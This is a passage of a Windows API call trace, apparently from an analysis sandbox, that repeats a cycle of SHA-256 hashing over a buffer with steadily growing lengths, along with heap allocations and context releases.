	[0216.983] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2735eb0, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2735eb0, pdwDataLen=0x1284a8) returned 1
	[0216.983] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0216.983] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0216.983] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0216.983] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0216.983] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0x6c0, dwFlags=0x0) returned 1
	[0216.983] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0216.983] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2735ed8
	[0216.983] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x2735ed8, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2735ed8, pdwDataLen=0x1284a8) returned 1
	[0216.983] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0216.983] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0216.983] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0216.984] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0216.984] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0x6e0, dwFlags=0x0) returned 1
	[0216.984] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0216.984] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2735f00
	[0216.984] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2735f00, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2735f00, pdwDataLen=0x1284a8) returned 1
	[0216.984] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0216.984] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0216.984] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0216.984] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0216.984] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0x700, dwFlags=0x0) returned 1
	[0216.984] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0216.984] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2735f28
	[0216.984] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x2735f28, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2735f28, pdwDataLen=0x1284a8) returned 1
	[0216.984] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0216.984] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0216.984] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0216.985] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0216.985] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0x720, dwFlags=0x0) returned 1
	[0216.985] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0216.985] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2735f50
	[0216.985] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2735f50, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2735f50, pdwDataLen=0x1284a8) returned 1
	[0216.985] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0216.985] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0216.985] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0216.985] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0216.985] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0x740, dwFlags=0x0) returned 1
	[0216.985] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0216.985] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2735f78
	[0216.985] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x2735f78, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2735f78, pdwDataLen=0x1284a8) returned 1
	[0216.985] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0216.985] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0216.985] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0216.986] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0216.986] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0x760, dwFlags=0x0) returned 1
	[0216.986] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0216.986] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2735fa0
	[0216.986] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2735fa0, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2735fa0, pdwDataLen=0x1284a8) returned 1
	[0216.986] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0216.986] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0216.986] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.028] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.028] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0x780, dwFlags=0x0) returned 1
	[0217.028] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.029] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2735fc8
	[0217.029] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x2735fc8, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2735fc8, pdwDataLen=0x1284a8) returned 1
	[0217.029] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0217.029] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.029] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.029] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.029] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0x7a0, dwFlags=0x0) returned 1
	[0217.029] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.029] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2735ff0
	[0217.029] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2735ff0, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2735ff0, pdwDataLen=0x1284a8) returned 1
	[0217.029] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0217.029] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.029] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.030] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.030] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0x7c0, dwFlags=0x0) returned 1
	[0217.030] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.030] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2736018
	[0217.030] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x2736018, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2736018, pdwDataLen=0x1284a8) returned 1
	[0217.030] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0217.030] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.030] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.030] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.030] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0x7e0, dwFlags=0x0) returned 1
	[0217.030] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.030] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2736040
	[0217.030] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2736040, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2736040, pdwDataLen=0x1284a8) returned 1
	[0217.030] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0217.030] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.030] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.031] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.031] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0x800, dwFlags=0x0) returned 1
	[0217.031] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.031] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2736068
	[0217.031] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x2736068, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2736068, pdwDataLen=0x1284a8) returned 1
	[0217.031] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0217.031] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.031] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.031] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.031] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0x820, dwFlags=0x0) returned 1
	[0217.031] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.031] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2736090
	[0217.031] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2736090, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2736090, pdwDataLen=0x1284a8) returned 1
	[0217.031] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0217.031] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.031] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.032] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.032] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0x840, dwFlags=0x0) returned 1
	[0217.032] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.032] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27360b8
	[0217.032] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x27360b8, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x27360b8, pdwDataLen=0x1284a8) returned 1
	[0217.032] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0217.032] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.032] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.032] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.032] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0x860, dwFlags=0x0) returned 1
	[0217.032] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.032] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27360e0
	[0217.032] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x27360e0, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x27360e0, pdwDataLen=0x1284a8) returned 1
	[0217.032] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0217.032] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.032] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.033] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.033] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0x880, dwFlags=0x0) returned 1
	[0217.033] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.033] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2736108
	[0217.033] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x2736108, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2736108, pdwDataLen=0x1284a8) returned 1
	[0217.033] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0217.033] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.033] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.033] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.033] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0x8a0, dwFlags=0x0) returned 1
	[0217.033] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.033] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2736130
	[0217.033] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2736130, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2736130, pdwDataLen=0x1284a8) returned 1
	[0217.033] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0217.033] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.033] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.034] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.034] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0x8c0, dwFlags=0x0) returned 1
	[0217.034] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.034] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2736158
	[0217.034] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x2736158, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2736158, pdwDataLen=0x1284a8) returned 1
	[0217.034] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0217.034] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.034] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.034] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.034] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0x8e0, dwFlags=0x0) returned 1
	[0217.034] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.034] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2736180
	[0217.034] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2736180, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2736180, pdwDataLen=0x1284a8) returned 1
	[0217.034] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0217.034] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.034] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.035] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.035] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0x900, dwFlags=0x0) returned 1
	[0217.035] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.035] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27361a8
	[0217.035] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x27361a8, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x27361a8, pdwDataLen=0x1284a8) returned 1
	[0217.035] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0217.035] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.035] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.035] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.035] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0x920, dwFlags=0x0) returned 1
	[0217.035] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.035] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27361d0
	[0217.035] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x27361d0, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x27361d0, pdwDataLen=0x1284a8) returned 1
	[0217.035] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0217.035] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.035] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.036] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.036] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0x940, dwFlags=0x0) returned 1
	[0217.036] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.036] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27361f8
	[0217.036] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x27361f8, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x27361f8, pdwDataLen=0x1284a8) returned 1
	[0217.036] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0217.036] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.036] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.036] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.036] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0x960, dwFlags=0x0) returned 1
	[0217.036] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.036] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2736220
	[0217.036] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2736220, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2736220, pdwDataLen=0x1284a8) returned 1
	[0217.036] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0217.036] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.036] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.037] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.037] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0x980, dwFlags=0x0) returned 1
	[0217.037] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.037] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2736248
	[0217.037] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x2736248, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2736248, pdwDataLen=0x1284a8) returned 1
	[0217.037] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0217.037] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.037] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.037] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.037] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0x9a0, dwFlags=0x0) returned 1
	[0217.037] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.037] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2736270
	[0217.037] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2736270, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2736270, pdwDataLen=0x1284a8) returned 1
	[0217.037] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0217.037] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.037] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.038] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.038] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0x9c0, dwFlags=0x0) returned 1
